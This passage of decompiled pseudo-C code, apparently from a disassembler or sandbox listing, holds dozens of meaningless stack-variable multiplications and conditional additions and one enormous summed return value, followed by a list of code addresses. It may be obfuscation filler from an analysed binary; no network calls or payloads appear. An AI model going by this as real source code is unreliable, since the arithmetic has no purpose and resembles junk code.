				 *(_t3971 - 0x1a0) =  *(_t3971 - 0x2ec) *  *(_t3971 - 0x274);
				 *(_t3971 - 0x24c) =  *(_t3971 - 0x544) *  *(_t3971 - 0x2f8);
				 *(_t3971 - 0x304) =  *(_t3971 - 0x574) *  *(_t3971 - 0x28c);
				 *(_t3971 - 0x2d4) =  *(_t3971 - 0x3dc) *  *(_t3971 - 0x4f8);
				if( *((intOrPtr*)(_t3971 - 0x7c)) <=  *(_t3971 - 0x2fc)) {
					 *((intOrPtr*)(_t3971 - 0x29c)) =  *(_t3971 - 0x17c) +  *(_t3971 - 0x28);
				}
				if( *(_t3971 - 0x1c) <=  *((intOrPtr*)(_t3971 - 0x330))) {
					 *((intOrPtr*)(_t3971 - 0x224)) =  *((intOrPtr*)(_t3971 - 0x7c)) +  *(_t3971 - 0x394);
				}
				if( *((intOrPtr*)(_t3971 - 0x45c)) <=  *(_t3971 - 0x4c)) {
					 *(_t3971 - 0x24) =  *(_t3971 - 0x278) +  *(_t3971 - 0x370);
				}
				 *(_t3971 - 0x25c) =  *(_t3971 - 0xc8) *  *(_t3971 - 0x170);
				if( *(_t3971 - 0x35c) <=  *((intOrPtr*)(_t3971 - 0x2a8))) {
					 *(_t3971 - 0x3c) =  *((intOrPtr*)(_t3971 - 0x5cc)) +  *(_t3971 - 0x140);
				}
				 *(_t3971 - 0x90) =  *(_t3971 - 0x238) *  *(_t3971 - 4);
				if( *((intOrPtr*)(_t3971 - 0x330)) >=  *(_t3971 - 0x248)) {
					 *(_t3971 - 0xa0) =  *(_t3971 - 0x268) +  *(_t3971 - 0x210);
				}
				 *(_t3971 - 0x198) =  *(_t3971 - 0x24c) *  *(_t3971 - 0x1c0);
				 *(_t3971 - 0x30) =  *(_t3971 - 0x70) *  *(_t3971 - 0x304);
				 *(_t3971 - 0x1dc) =  *(_t3971 - 0x5a4) *  *(_t3971 - 0xf0);
				 *(_t3971 - 0x384) =  *(_t3971 - 0x218) *  *(_t3971 - 0x13c);
				 *(_t3971 - 0x270) =  *(_t3971 - 0xe0) *  *(_t3971 - 0x8c);
				if( *((intOrPtr*)(_t3971 - 0xd4)) >=  *(_t3971 - 0x15c)) {
					 *(_t3971 - 0x1c4) =  *((intOrPtr*)(_t3971 - 0x2a8)) +  *(_t3971 - 0x138);
				}
				 *(_t3971 - 0x2b4) =  *(_t3971 - 0x1ac) *  *(_t3971 - 0x134);
				if( *((intOrPtr*)(_t3971 - 0xc4)) <=  *(_t3971 - 0x10)) {
					 *(_t3971 - 0x310) =  *((intOrPtr*)(_t3971 - 0x2b0)) +  *(_t3971 - 0x118);
				}
				 *(_t3971 - 0x144) =  *(_t3971 - 0x13c) *  *(_t3971 - 0x518);
				if( *((intOrPtr*)(_t3971 - 0x19c)) <=  *((intOrPtr*)(_t3971 - 0x390))) {
					 *((intOrPtr*)(_t3971 - 0x520)) =  *(_t3971 - 0x40) +  *(_t3971 - 0xc);
				}
				if( *((intOrPtr*)(_t3971 - 0x154)) <=  *(_t3971 - 0x1dc)) {
					 *((intOrPtr*)(_t3971 - 0x540)) =  *(_t3971 - 0x16c) +  *(_t3971 - 0x5c);
				}
				if( *(_t3971 - 0x2c) <=  *((intOrPtr*)(_t3971 - 0x554))) {
					 *(_t3971 - 0x14) =  *(_t3971 - 0x38) +  *((intOrPtr*)(_t3971 - 0x180));
				}
				 *(_t3971 - 0xb4) =  *(_t3971 - 0x2dc) *  *(_t3971 - 0x4bc);
				 *(_t3971 - 0x48) =  *(_t3971 - 0x580) *  *(_t3971 - 0xd0);
				if( *(_t3971 - 0x4c) <=  *((intOrPtr*)(_t3971 - 0x3ac))) {
					 *((intOrPtr*)(_t3971 - 0x11c)) =  *((intOrPtr*)(_t3971 - 0x1f4)) +  *(_t3971 - 0xac);
				}
				 *(_t3971 - 0x214) =  *(_t3971 - 0x158) *  *(_t3971 - 8);
				if( *((intOrPtr*)(_t3971 - 0x11c)) >=  *(_t3971 - 0x360)) {
					 *(_t3971 - 0x9c) =  *(_t3971 - 0x190) +  *((intOrPtr*)(_t3971 - 0x4b4));
				}
				 *(_t3971 - 0x35c) =  *(_t3971 - 0x36c) *  *(_t3971 - 0x428);
				 *(_t3971 - 0x250) =  *(_t3971 - 0x20) *  *(_t3971 - 0x310);
				 *(_t3971 - 0x2d8) =  *(_t3971 - 0x434) *  *(_t3971 - 0x3c);
				 *(_t3971 - 0xe8) =  *(_t3971 - 0x8c) *  *(_t3971 - 0x1d0);
				 *(_t3971 - 0x1c4) =  *(_t3971 - 0x54) *  *(_t3971 - 0x94);
				if( *((intOrPtr*)(_t3971 - 0x410)) >=  *((intOrPtr*)(_t3971 - 0x98))) {
					 *((intOrPtr*)(_t3971 - 0x32c)) =  *(_t3971 - 0x64) +  *(_t3971 - 0xe4);
				}
				 *(_t3971 - 0x134) =  *(_t3971 - 0xd0) *  *(_t3971 - 8);
				if( *(_t3971 - 0x84) <=  *(_t3971 - 4)) {
					 *(_t3971 - 0x18) =  *((intOrPtr*)(_t3971 - 0x348)) +  *(_t3971 - 0xc8);
				}
				if( *((intOrPtr*)(_t3971 - 0x3d8)) <=  *(_t3971 - 0x148)) {
					 *(_t3971 - 0x1a8) =  *(_t3971 - 0xb4) +  *(_t3971 - 0x30);
				}
				 *(_t3971 - 0x3a4) =  *(_t3971 - 0x27c) *  *(_t3971 - 0x39c);
				if( *(_t3971 - 0x124) >=  *(_t3971 - 0x78)) {
					 *(_t3971 - 0x2cc) =  *((intOrPtr*)(_t3971 - 0x474)) +  *(_t3971 - 0x228);
				}
				 *(_t3971 - 0x414) =  *(_t3971 - 0x100) *  *(_t3971 - 0x308);
				 *(_t3971 - 0xc0) =  *(_t3971 - 0x30) *  *(_t3971 - 0x4c0);
				if( *(_t3971 - 0x70) <=  *((intOrPtr*)(_t3971 - 0x42c))) {
					 *(_t3971 - 0x24) =  *(_t3971 - 0x6c) +  *(_t3971 - 0x68);
				}
				if( *(_t3971 - 0x350) <=  *((intOrPtr*)(_t3971 - 0x460))) {
					 *(_t3971 - 0x160) =  *(_t3971 - 4) +  *(_t3971 - 0x1c);
				}
				if( *(_t3971 - 8) >=  *((intOrPtr*)(_t3971 - 0x448))) {
					 *((intOrPtr*)(_t3971 - 0x404)) =  *((intOrPtr*)(_t3971 - 0x98)) +  *(_t3971 - 0x1d4);
				}
				if( *(_t3971 - 0x20) <=  *((intOrPtr*)(_t3971 - 0x37c))) {
					 *((intOrPtr*)(_t3971 - 0x2b8)) =  *(_t3971 - 0x1b0) +  *((intOrPtr*)(_t3971 - 0x378));
				}
				if( *((intOrPtr*)(_t3971 - 0x1d8)) <=  *((intOrPtr*)(_t3971 - 0x41c))) {
					 *(_t3971 - 0x80) =  *(_t3971 - 0x23c) +  *(_t3971 - 0x1f0);
				}
				if( *(_t3971 - 0x54) <=  *((intOrPtr*)(_t3971 - 0x328))) {
					 *((intOrPtr*)(_t3971 - 0x3d0)) =  *((intOrPtr*)(_t3971 - 0x528)) +  *((intOrPtr*)(_t3971 - 0x1c8));
				}
				if( *((intOrPtr*)(_t3971 - 0x184)) <=  *((intOrPtr*)(_t3971 - 0x280))) {
					 *(_t3971 - 0x144) =  *(_t3971 - 0x2e8) +  *((intOrPtr*)(_t3971 - 0x5bc));
				}
				 *(_t3971 - 0xd8) =  *(_t3971 - 0x58) *  *(_t3971 - 0x14c);
				 *(_t3971 - 0x38) =  *(_t3971 - 0x23c) *  *(_t3971 - 0x194);
				 *(_t3971 - 0xdc) =  *(_t3971 - 0x30c) *  *(_t3971 - 0x20);
				 *(_t3971 - 0x250) =  *(_t3971 - 0x70) *  *(_t3971 - 0x2c);
				 *((intOrPtr*)(_t3971 + 8)) =  *((intOrPtr*)(_t3971 + 8)) +  *(_t3971 - 0xac) +  *((intOrPtr*)(_t3971 - 0x5dc)) +  *(_t3971 - 0x39c) +  *(_t3971 - 0xc) +  *(_t3971 - 0x3a0) +  *(_t3971 - 0x3a4) +  *(_t3971 - 0xb0) +  *((intOrPtr*)(_t3971 - 0x5e0)) +  *(_t3971 - 0x194) +  *((intOrPtr*)(_t3971 - 0x5e4)) +  *(_t3971 - 0x198) +  *((intOrPtr*)(_t3971 - 0x19c)) +  *((intOrPtr*)(_t3971 - 0x5e8)) +  *(_t3971 - 0x1a0) +  *((intOrPtr*)(_t3971 - 0x1a4)) +  *((intOrPtr*)(_t3971 - 0x5ec)) +  *(_t3971 - 0x3a8) +  *(_t3971 - 0xb4) +  *((intOrPtr*)(_t3971 - 0x3ac)) +  *((intOrPtr*)(_t3971 - 0x5f0)) +  *(_t3971 - 0x1a8) +  *(_t3971 - 0x1ac) +  *(_t3971 - 0x10) +  *(_t3971 - 0x2c) +  *(_t3971 - 0x1b0) +  *(_t3971 - 0xb8) +  *(_t3971 - 0x30) +  *((intOrPtr*)(_t3971 - 0x1b4)) +  *((intOrPtr*)(_t3971 - 0x3b0)) +  *((intOrPtr*)(_t3971 - 0x3b4)) +  *((intOrPtr*)(_t3971 - 0xbc)) +  *((intOrPtr*)(_t3971 - 0x5f4)) +  *((intOrPtr*)(_t3971 - 0x3b8)) +  *((intOrPtr*)(_t3971 - 0x3bc)) +  *(_t3971 - 0x1b8) +  *(_t3971 - 0x3c0) +  *((intOrPtr*)(_t3971 - 0x3c4)) +  *((intOrPtr*)(_t3971 - 0x3c8)) +  *((intOrPtr*)(_t3971 - 0x3cc)) +  *((intOrPtr*)(_t3971 - 0x5f8)) +  *((intOrPtr*)(_t3971 - 0x5fc)) +  *((intOrPtr*)(_t3971 - 0x3d0)) +  *((intOrPtr*)(_t3971 - 0x3d4)) +  *(_t3971 - 0x1bc) +  *(_t3971 - 0x14) +  *(_t3971 - 0x1c0) +  *(_t3971 - 0x18) +  *((intOrPtr*)(_t3971 - 0x3d8)) +  *((intOrPtr*)(_t3971 - 0x600)) +  *(_t3971 - 0x1c4) +  *((intOrPtr*)(_t3971 - 0x604)) +  *(_t3971 - 0x3dc) +  *(_t3971 - 0x34) +  *((intOrPtr*)(_t3971 - 0x3e0)) +  *((intOrPtr*)(_t3971 - 0x1c8)) +  *(_t3971 - 0x3e4) +  *((intOrPtr*)(_t3971 - 0x3e8)) +  *(_t3971 - 0x3ec) +  *((intOrPtr*)(_t3971 - 0x3f0)) +  *(_t3971 - 0x3f4) +  *((intOrPtr*)(_t3971 - 0x608)) +  *(_t3971 - 0xc0) +  *((intOrPtr*)(_t3971 - 0x60c)) +  *((intOrPtr*)(_t3971 - 0x610)) +  *(_t3971 - 0x38) +  *(_t3971 - 0x1cc) +  *((intOrPtr*)(_t3971 - 0x3f8)) +  *((intOrPtr*)(_t3971 - 0xc4)) +  *((intOrPtr*)(_t3971 - 0x3fc)) +  *(_t3971 - 0xc8) +  *(_t3971 - 0xcc) +  *(_t3971 - 0xd0) +  *(_t3971 - 0x3c) +  *((intOrPtr*)(_t3971 - 0xd4)) +  *(_t3971 - 0x400) +  *((intOrPtr*)(_t3971 - 0x614)) +  *((intOrPtr*)(_t3971 - 0x404)) +  *((intOrPtr*)(_t3971 - 0x618)) +  *((intOrPtr*)(_t3971 - 0x408)) +  *(_t3971 - 0x40c) +  *(_t3971 - 0x40) +  *((intOrPtr*)(_t3971 - 0x61c)) +  *((intOrPtr*)(_t3971 - 0x410)) +  *(_t3971 - 0x1d0) +  *(_t3971 - 0x414) +  *((intOrPtr*)(_t3971 - 0x418)) +  *(_t3971 - 0x1d4) +  *((intOrPtr*)(_t3971 - 0x41c)) +  *(_t3971 - 0xd8) +  *((intOrPtr*)(_t3971 - 0x1d8)) +  *(_t3971 - 0xdc) +  *(_t3971 - 0x420) +  *(_t3971 - 0x1dc) +  *((intOrPtr*)(_t3971 - 0x1e0)) +  *((intOrPtr*)(_t3971 - 0x424)) +  *(_t3971 - 0x44) +  *(_t3971 - 0x1e4) +  *(_t3971 - 0x1e8) +  *(_t3971 - 0x1ec) +  *(_t3971 - 0x428) +  *((intOrPtr*)(_t3971 - 0x620)) +  *(_t3971 - 0x1f0) +  *((intOrPtr*)(_t3971 - 0x624)) +  *((intOrPtr*)(_t3971 - 0x1f4)) +  *((intOrPtr*)(_t3971 - 0x42c)) +  *(_t3971 - 0x1f8) +  *(_t3971 - 0x430) +  *(_t3971 - 0xe0) +  *((intOrPtr*)(_t3971 - 0x1fc)) +  *(_t3971 - 0x48) +  *(_t3971 - 0x200) +  *(_t3971 - 0xe4) +  *(_t3971 - 0x434) +  *(_t3971 - 0xe8) +  *(_t3971 - 0x438) +  *((intOrPtr*)(_t3971 - 0x204)) +  *(_t3971 - 0x208) +  *((intOrPtr*)(_t3971 - 0x628)) +  *((intOrPtr*)(_t3971 - 0x20c)) +  *((intOrPtr*)(_t3971 - 0x43c)) +  *(_t3971 - 0x210) +  *(_t3971 - 0xec) +  *(_t3971 - 0x214) +  *((intOrPtr*)(_t3971 - 0x62c)) +  *(_t3971 - 0xf0) +  *((intOrPtr*)(_t3971 - 0x630)) +  *((intOrPtr*)(_t3971 - 0x440)) +  *(_t3971 - 0x4c) +  *(_t3971 - 0x218) +  *(_t3971 - 0x444) +  *((intOrPtr*)(_t3971 - 0x634)) +  *((intOrPtr*)(_t3971 - 0x448)) +  *(_t3971 - 0x1c) +  *(_t3971 - 0x44c) +  *((intOrPtr*)(_t3971 - 0x450)) +  *(_t3971 - 0x21c) +  *(_t3971 - 0x50) +  *((intOrPtr*)(_t3971 - 0x638)) +  *((intOrPtr*)(_t3971 - 0x63c)) +  *(_t3971 - 0x220) +  *((intOrPtr*)(_t3971 - 0x224)) +  *(_t3971 - 0x228) +  *((intOrPtr*)(_t3971 - 0x454)) +  *((intOrPtr*)(_t3971 - 0x458)) +  *((intOrPtr*)(_t3971 - 0x45c)) +  *((intOrPtr*)(_t3971 - 0x460)) +  *((intOrPtr*)(_t3971 - 0x464)) +  *((intOrPtr*)(_t3971 - 0x640)) +  *(_t3971 - 0xf4) +  *((intOrPtr*)(_t3971 - 0x644)) +  *((intOrPtr*)(_t3971 - 0x648)) +  *(_t3971 - 0xf8) +  *((intOrPtr*)(_t3971 - 0x468)) +  *(_t3971 - 0x22c) +  *(_t3971 - 0x230) +  *((intOrPtr*)(_t3971 - 0x46c)) +  *(_t3971 - 0x470) +  *(_t3971 - 0x234) +  *((intOrPtr*)(_t3971 - 0xfc)) +  *((intOrPtr*)(_t3971 - 0x474)) +  *(_t3971 - 0x478) +  *(_t3971 - 0x100) +  *(_t3971 - 0x47c) +  *(_t3971 - 0x238) +  *(_t3971 - 0x480) +  *(_t3971 - 0x484) +  *(_t3971 - 0x488) +  *(_t3971 - 0x23c) +  *(_t3971 - 0x240) +  *(_t3971 - 0x48c) +  *((intOrPtr*)(_t3971 - 0x490)) +  *((intOrPtr*)(_t3971 - 0x494)) +  *(_t3971 - 0x244) +  *(_t3971 - 0x54) +  *(_t3971 - 0x498) +  *(_t3971 - 0x248) +  *((intOrPtr*)(_t3971 - 0x64c)) +  *(_t3971 - 0x58) +  *(_t3971 - 0x5c) +  *(_t3971 - 0x49c) +  *((intOrPtr*)(_t3971 - 0x650)) +  *(_t3971 - 0x24c) +  *(_t3971 - 0x104) +  *((intOrPtr*)(_t3971 - 0x4a0)) +  *(_t3971 - 0x250) +  *((intOrPtr*)(_t3971 - 0x654)) +  *((intOrPtr*)(_t3971 - 0x4a4)) +  *(_t3971 - 0x4a8) +  *((intOrPtr*)(_t3971 - 0x4ac)) +  *(_t3971 - 0x254) +  *((intOrPtr*)(_t3971 - 0x658)) +  *(_t3971 - 0x258) +  *(_t3971 - 0x25c) +  *((intOrPtr*)(_t3971 - 0x65c)) +  *(_t3971 - 0x260) +  *(_t3971 - 0x264) +  *(_t3971 - 0x108) +  *(_t3971 - 0x20) +  *(_t3971 - 0x10c) +  *(_t3971 - 0x110) +  *((intOrPtr*)(_t3971 - 0x660)) +  *(_t3971 - 0x268) +  *(_t3971 - 0x114) +  *(_t3971 - 0x118) +  *((intOrPtr*)(_t3971 - 0x11c)) +  *(_t3971 - 0x60) +  *(_t3971 - 0x26c) +  *(_t3971 - 0x270) +  *((intOrPtr*)(_t3971 - 0x4b0)) +  *((intOrPtr*)(_t3971 - 0x4b4)) +  *(_t3971 - 0x120) +  *((intOrPtr*)(_t3971 - 0x4b8)) +  *(_t3971 - 0x274) +  *((intOrPtr*)(_t3971 - 0x664)) +  *(_t3971 - 0x4bc) +  *(_t3971 - 0x278) +  *(_t3971 - 0x4c0) +  *((intOrPtr*)(_t3971 - 0x4c4)) +  *(_t3971 - 0x4c8) +  *(_t3971 - 0x4cc) +  *((intOrPtr*)(_t3971 - 0x4d0)) +  *((intOrPtr*)(_t3971 - 0x668)) +  *(_t3971 - 0x27c) +  *((intOrPtr*)(_t3971 - 0x280)) +  *(_t3971 - 0x64) +  *((intOrPtr*)(_t3971 - 0x66c)) +  *((intOrPtr*)(_t3971 - 0x670)) +  *(_t3971 - 0x4d4) +  *(_t3971 - 0x4d8) +  *((intOrPtr*)(_t3971 - 0x4dc)) +  *((intOrPtr*)(_t3971 - 0x4e0)) +  *((intOrPtr*)(_t3971 - 0x284)) +  *(_t3971 - 0x288) +  *(_t3971 - 0x4e4) +  *(_t3971 - 0x28c) +  *((intOrPtr*)(_t3971 - 0x674)) +  *(_t3971 - 0x290) +  *((intOrPtr*)(_t3971 - 0x294)) +  *(_t3971 - 0x298) +  *(_t3971 - 0x68) +  *((intOrPtr*)(_t3971 - 0x29c)) +  *(_t3971 - 0x2a0) +  *(_t3971 - 0x2a4) +  *((intOrPtr*)(_t3971 - 0x2a8)) +  *(_t3971 - 0x2ac) +  *((intOrPtr*)(_t3971 - 0x2b0)) +  *(_t3971 - 0x2b4) +  *((intOrPtr*)(_t3971 - 0x2b8)) +  *(_t3971 - 0x2bc) +  *((intOrPtr*)(_t3971 - 0x4e8)) +  *(_t3971 - 0x124) +  *((intOrPtr*)(_t3971 - 0x678)) +  *((intOrPtr*)(_t3971 - 0x67c)) +  *((intOrPtr*)(_t3971 - 0x680)) +  *(_t3971 - 0x2c0) +  *(_t3971 - 0x4ec) +  *((intOrPtr*)(_t3971 - 0x684)) +  *((intOrPtr*)(_t3971 - 0x2c4)) +  *(_t3971 - 0x2c8) +  *((intOrPtr*)(_t3971 - 0x4f0)) +  *((intOrPtr*)(_t3971 - 0x688)) +  *((intOrPtr*)(_t3971 - 0x68c)) +  *(_t3971 - 0x2cc) +  *(_t3971 - 0x6c) +  *((intOrPtr*)(_t3971 - 0x4f4)) +  *(_t3971 - 0x4f8) +  *((intOrPtr*)(_t3971 - 0x690)) +  *((intOrPtr*)(_t3971 - 0x4fc)) +  *(_t3971 - 0x500) +  *((intOrPtr*)(_t3971 - 0x128)) +  *(_t3971 - 4) +  *((intOrPtr*)(_t3971 - 0x504)) +  *(_t3971 - 0x2d0) +  *(_t3971 - 0x12c) +  *(_t3971 - 0x2d4) +  *(_t3971 - 0x70) +  *(_t3971 - 0x2d8) +  *((intOrPtr*)(_t3971 - 0x508)) +  *(_t3971 - 0x2dc) +  *(_t3971 - 0x2e0) +  *(_t3971 - 0x130) +  *(_t3971 - 0x2e4) +  *(_t3971 - 0x134) +  *((intOrPtr*)(_t3971 - 0x694)) +  *((intOrPtr*)(_t3971 - 0x74)) +  *(_t3971 - 0x50c) +  *((intOrPtr*)(_t3971 - 0x510)) +  *(_t3971 - 0x78) +  *((intOrPtr*)(_t3971 - 0x698)) +  *(_t3971 - 0x2e8) +  *((intOrPtr*)(_t3971 - 0x69c)) +  *((intOrPtr*)(_t3971 - 0x514)) +  *((intOrPtr*)(_t3971 - 0x6a0)) +  *((intOrPtr*)(_t3971 - 0x6a4)) +  *(_t3971 - 0x2ec) +  *((intOrPtr*)(_t3971 - 0x6a8)) +  *(_t3971 - 0x518) +  *((intOrPtr*)(_t3971 - 0x2f0)) +  *(_t3971 - 0x51c) +  *((intOrPtr*)(_t3971 - 0x520)) +  *((intOrPtr*)(_t3971 - 0x524)) +  *(_t3971 - 0x2f4) +  *(_t3971 - 0x2f8) +  *(_t3971 - 0x2fc) +  *((intOrPtr*)(_t3971 - 0x528)) +  *((intOrPtr*)(_t3971 - 0x6ac)) +  *((intOrPtr*)(_t3971 - 0x6b0)) +  *((intOrPtr*)(_t3971 - 0x300)) +  *(_t3971 - 0x52c) +  *(_t3971 - 0x138) +  *((intOrPtr*)(_t3971 - 0x530)) +  *((intOrPtr*)(_t3971 - 0x534)) +  *((intOrPtr*)(_t3971 - 0x6b4)) +  *(_t3971 - 0x13c) +  *(_t3971 - 0x538) +  *((intOrPtr*)(_t3971 - 0x6b8)) +  *(_t3971 - 0x304) +  *(_t3971 - 0x140) +  *(_t3971 - 0x144) +  *(_t3971 - 0x308) +  *(_t3971 - 0x30c) +  *(_t3971 - 0x310) +  *((intOrPtr*)(_t3971 - 0x6bc)) +  *((intOrPtr*)(_t3971 - 0x53c)) +  *((intOrPtr*)(_t3971 - 0x314)) +  *(_t3971 - 0x318) +  *((intOrPtr*)(_t3971 - 0x540)) +  *((intOrPtr*)(_t3971 - 0x6c0)) +  *(_t3971 - 0x148) +  *((intOrPtr*)(_t3971 - 0x6c4)) +  *(_t3971 - 0x544) +  *(_t3971 - 0x14c) +  *((intOrPtr*)(_t3971 - 0x31c)) +  *((intOrPtr*)(_t3971 - 0x7c)) +  *(_t3971 - 0x150) +  *((intOrPtr*)(_t3971 - 0x154)) +  *(_t3971 - 0x158) +  *(_t3971 - 0x80) +  *((intOrPtr*)(_t3971 - 0x548)) +  *((intOrPtr*)(_t3971 - 0x54c)) +  *((intOrPtr*)(_t3971 - 0x550)) +  *((intOrPtr*)(_t3971 - 0x6c8)) +  *((intOrPtr*)(_t3971 - 0x554)) +  *((intOrPtr*)(_t3971 - 0x6cc)) +  *(_t3971 - 0x558) +  *(_t3971 - 0x84) +  *((intOrPtr*)(_t3971 - 0x6d0)) +  *((intOrPtr*)(_t3971 - 0x55c)) +  *((intOrPtr*)(_t3971 - 0x6d4)) +  *(_t3971 - 0x15c) +  *((intOrPtr*)(_t3971 - 0x6d8)) +  *((intOrPtr*)(_t3971 - 0x320)) +  *(_t3971 - 0x560) +  *((intOrPtr*)(_t3971 - 0x324)) +  *((intOrPtr*)(_t3971 - 0x328)) +  *((intOrPtr*)(_t3971 - 0x32c)) +  *((intOrPtr*)(_t3971 - 0x6dc)) +  *((intOrPtr*)(_t3971 - 0x6e0)) +  *(_t3971 - 0x160) +  *(_t3971 - 0x564) +  *(_t3971 - 0x88) +  *((intOrPtr*)(_t3971 - 0x568)) +  *(_t3971 - 0x56c) +  *(_t3971 - 0x8c) +  *((intOrPtr*)(_t3971 - 0x330)) +  *(_t3971 - 0x90) +  *(_t3971 - 0x334) +  *(_t3971 - 0x164) +  *(_t3971 - 0x338) +  *((intOrPtr*)(_t3971 - 0x570)) +  *(_t3971 - 0x33c) +  *(_t3971 - 0x94) +  *((intOrPtr*)(_t3971 - 0x340)) +  *((intOrPtr*)(_t3971 - 0x6e4)) +  *(_t3971 - 0x574) +  *((intOrPtr*)(_t3971 - 0x168)) +  *(_t3971 - 0x578) +  *((intOrPtr*)(_t3971 - 0x6e8)) +  *(_t3971 - 0x344) +  *((intOrPtr*)(_t3971 - 0x6ec)) +  *((intOrPtr*)(_t3971 - 0x98)) +  *((intOrPtr*)(_t3971 - 0x57c)) +  *((intOrPtr*)(_t3971 - 0x348)) +  *(_t3971 - 0x580) +  *(_t3971 - 0x584) +  *(_t3971 - 0x34c) +  *(_t3971 - 0x350) +  *((intOrPtr*)(_t3971 - 0x588)) +  *(_t3971 - 0x354) +  *(_t3971 - 0x58c) +  *(_t3971 - 0x16c) +  *(_t3971 - 0x358) +  *(_t3971 - 0x24) +  *((intOrPtr*)(_t3971 - 0x590)) +  *(_t3971 - 0x35c) +  *((intOrPtr*)(_t3971 - 0x6f0)) +  *(_t3971 - 0x360) +  *((intOrPtr*)(_t3971 - 0x364)) +  *((intOrPtr*)(_t3971 - 0x594)) +  *(_t3971 - 0x170) +  *((intOrPtr*)(_t3971 - 0x368)) +  *((intOrPtr*)(_t3971 - 0x174)) +  *(_t3971 - 0x36c) +  *((intOrPtr*)(_t3971 - 0x598)) +  *(_t3971 - 0x9c) +  *(_t3971 - 0x28) +  *(_t3971 - 0x59c) +  *((intOrPtr*)(_t3971 - 0x6f4)) +  *((intOrPtr*)(_t3971 - 0x5a0)) +  *(_t3971 - 0x178) +  *(_t3971 - 0x5a4) +  *((intOrPtr*)(_t3971 - 0x6f8)) +  *(_t3971 - 0x5a8) +  *(_t3971 - 0x370) +  *(_t3971 - 0x17c) +  *((intOrPtr*)(_t3971 - 0x374)) +  *((intOrPtr*)(_t3971 - 0x6fc)) +  *(_t3971 - 0x5ac) +  *((intOrPtr*)(_t3971 - 0x378)) +  *((intOrPtr*)(_t3971 - 0x180)) +  *(_t3971 - 0x5b0) +  *((intOrPtr*)(_t3971 - 0x184)) +  *((intOrPtr*)(_t3971 - 0x5b4)) +  *(_t3971 - 0xa0) +  *((intOrPtr*)(_t3971 - 0x700)) +  *(_t3971 - 0x5b8) +  *((intOrPtr*)(_t3971 - 0x37c)) +  *(_t3971 - 0x188) +  *((intOrPtr*)(_t3971 - 0x380)) +  *((intOrPtr*)(_t3971 - 0x5bc)) +  *(_t3971 - 0x384) +  *((intOrPtr*)(_t3971 - 0xa4)) +  *((intOrPtr*)(_t3971 - 0x704)) +  *((intOrPtr*)(_t3971 - 0x5c0)) +  *(_t3971 - 0x18c) +  *((intOrPtr*)(_t3971 - 0x388)) +  *((intOrPtr*)(_t3971 - 0x708)) +  *((intOrPtr*)(_t3971 - 0x5c4)) +  *(_t3971 - 0x5c8) +  *(_t3971 - 8) +  *(_t3971 - 0x38c) +  *(_t3971 - 0xa8) +  *((intOrPtr*)(_t3971 - 0x70c)) +  *((intOrPtr*)(_t3971 - 0x390)) +  *((intOrPtr*)(_t3971 - 0x5cc)) +  *(_t3971 - 0x394) +  *((intOrPtr*)(_t3971 - 0x5d0)) +  *(_t3971 - 0x190) +  *((intOrPtr*)(_t3971 - 0x710)) +  *((intOrPtr*)(_t3971 - 0x714)) +  *((intOrPtr*)(_t3971 - 0x5d4)) +  *(_t3971 - 0x5d8) +  *(_t3971 - 0x398) +  *((intOrPtr*)(_t3971 - 0x718));
				return  *((intOrPtr*)(_t3971 + 8));
			}

0x6e44e505
0x6e44e50f
0x6e44e51f
0x6e44e51f
0x6e44e52b
0x6e44e537
0x6e44e545
0x6e44e554
0x6e44e560
0x6e44e56e
0x6e44e57a
0x6e44e586
0x6e44e594
0x6e44e5a3
0x6e44e5b2
0x6e44e5be
0x6e44e5cd
0x6e44e5dc
0x6e44e5e8
0x6e44e5f7
0x6e44e603
0x6e44e611
0x6e44e620
0x6e44e62f
0x6e44e63d
0x6e44e64c
0x6e44e65b
0x6e44e664
0x6e44e66d
0x6e44e67c
0x6e44e68a
0x6e44e696
0x6e44e6a5
0x6e44e6b3
0x6e44e6c2
0x6e44e6d1
0x6e44e6df
0x6e44e6ee
0x6e44e6fd
0x6e44e70b
0x6e44e71a
0x6e44e729
0x6e44e737
0x6e44e746
0x6e44e755
0x6e44e763
0x6e44e772
0x6e44e781
0x6e44e78f
0x6e44e79b
0x6e44e7a7
0x6e44e7b0
0x6e44e7bf
0x6e44e7ce
0x6e44e7dc
0x6e44e7e8
0x6e44e7f4
0x6e44e7ff
0x6e44e80e
0x6e44e81d
0x6e44e82b
0x6e44e83a
0x6e44e846
0x6e44e854
0x6e44e863
0x6e44e872
0x6e44e880
0x6e44e88c
0x6e44e89b
0x6e44e8a6
0x6e44e8b5
0x6e44e8c4
0x6e44e8d0
0x6e44e8df
0x6e44e8ee
0x6e44e8fc
0x6e44e908
0x6e44e914
0x6e44e922
0x6e44e931
0x6e44e940
0x6e44e94e
0x6e44e95a
0x6e44e969
0x6e44e977
0x6e44e980
0x6e44e98c
0x6e44e99a
0x6e44e9a9
0x6e44e9b8
0x6e44e9c6
0x6e44e9d5
0x6e44e9e4
0x6e44e9f2
0x6e44ea01
0x6e44ea10
0x6e44ea1c
0x6e44ea28
0x6e44ea37
0x6e44ea45
0x6e44ea51
0x6e44ea60
0x6e44ea6e
0x6e44ea7d
0x6e44ea8c
0x6e44ea98
0x6e44eaa7
0x6e44eab6
0x6e44eac4
0x6e44ead0
0x6e44eadf
0x6e44eaeb
0x6e44eafa
0x6e44eb09
0x6e44eb12
0x6e44eb21
0x6e44eb30
0x6e44eb3e
0x6e44eb4a
0x6e44eb59
0x6e44eb67
0x6e44eb73
0x6e44eb82
0x6e44eb90
0x6e44eb9c
0x6e44ebab
0x6e44ebb9
0x6e44ebc5
0x6e44ebd1
0x6e44ebdf
0x6e44ebeb
0x6e44ebfa
0x6e44ec05
0x6e44ec14
0x6e44ec23
0x6e44ec31
0x6e44ec40
0x6e44ec49
0x6e44ec57
0x6e44ec66
0x6e44ec75
0x6e44ec80
0x6e44ec8c
0x6e44ec98
0x6e44eca6
0x6e44ecb5
0x6e44ecc4
0x6e44ecd2
0x6e44ece1
0x6e44eced
0x6e44ecfb
0x6e44ed07
0x6e44ed16
0x6e44ed24
0x6e44ed33
0x6e44ed3f
0x6e44ed4b
0x6e44ed5a
0x6e44ed69
0x6e44ed77
0x6e44ed86
0x6e44ed92
0x6e44eda0
0x6e44edaf
0x6e44edbe
0x6e44edcc
0x6e44eddb
0x6e44edea
0x6e44edf8
0x6e44ee07
0x6e44ee16
0x6e44ee24
0x6e44ee33
0x6e44ee42
0x6e44ee50
0x6e44ee5c
0x6e44ee68
0x6e44ee76
0x6e44ee82
0x6e44ee91
0x6e44ee9f
0x6e44eeae
0x6e44eeba
0x6e44eec3
0x6e44eed2
0x6e44eee1
0x6e44eeef
0x6e44eefe
0x6e44ef0d
0x6e44ef1b
